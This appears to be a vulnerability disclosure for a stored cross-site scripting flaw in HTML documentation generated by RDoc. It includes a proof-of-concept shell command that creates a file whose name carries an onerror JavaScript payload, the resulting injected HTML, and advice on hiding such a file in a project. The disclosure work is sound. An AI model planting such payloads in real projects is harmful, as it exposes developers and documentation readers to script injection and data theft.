XSS exploit of RDoc documentation generated by rdoc

When creating an RDoc html documentation, there is a possibility to inject malicious code through file name. # PoC ```bash ~ $ touch \"\>\<object\ src\=1\ onerror\=\"javascript\:alert\(1\)\;\"\>Controlling\ what\ is\ documented\ here ~ $ ls "><object src=1 onerror="blocked:alert(1);">Controlling what is documented here ~ $ rdoc --all ``` Now, the generated index file has injected javascript code: ```html ... <li><a href="./"><object src=1 onerror="blocked:alert(1);">Controlling what is documented here.html">&quot;&gt;&lt;object src=1 onerror=&quot;blocked:alert(1);&quot;&gt;Controlling what is documented here</a> ... ``` I set to the vulnerability the same severity as CVE-2013-0256 has, since rdoc is widely used on dev/production systems online documentation, etc. An attacker can hide a bad-named-file deep in the project structure to be stealthy. Also, the file can be very tricky-named in documentation list, can contain the real documentation code, and so as not to arouse suspicion for some time. ## Impact The injected code can exfiltrate data or install malware on the (user|developer)’s machine, etc.